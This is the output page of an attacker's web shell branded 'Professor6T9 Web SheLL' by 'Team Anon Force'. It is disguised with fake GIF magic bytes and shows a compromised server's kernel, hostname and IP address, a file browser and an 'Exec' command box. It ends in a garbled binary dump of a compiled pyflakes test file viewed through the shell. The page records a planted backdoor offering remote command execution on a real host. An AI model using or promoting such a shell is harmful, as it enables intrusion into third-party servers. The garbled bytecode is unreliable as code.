GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
opt
/
cloudlinux
/
venv
/
lib
/
python3.11
/
site-packages
/
pyflakes
/
test
/
__pycache__
[ HOME ]
Exec
Submit
test_api.cpython-311.pyc
� �|oii � �r � d Z ddlZddlZddlZddlZddlZddlZddlZddlm Z ddl mZ ddlm Z ddlmZmZmZmZmZ ddlmZmZ d� Z G d � d � � Z G d� d� � Z G d � d� � Z G d� de� � Z G d� de� � Z G d� de� � Z G d� de� � Z G d� de� � ZdS )z) Tests for L{pyflakes.scripts.pyflakes}. � N)�PYPY)�UnusedImport)�Reporter)�main�check� checkPath�checkRecursive�iterSourceCode)�TestCase�skipIfc � � t j | c}t _ ||i |��|t _ S # |t _ w xY w)z? Call C{f} with C{sys.stderr} redirected to C{stderr}. )�sys�stderr)r �f�args�kwargs�outers �h/builddir/build/BUILD/cloudlinux-venv-1.0.10/venv/lib/python3.11/site-packages/pyflakes/test/test_api.py�withStderrTor sG � � �:�v��U�C�J���q�$�!�&�!�!��� � ��U�� ����s �/ �=c � � e Zd ZdZdd�ZdS )�Nodez Mock an AST node. r c �"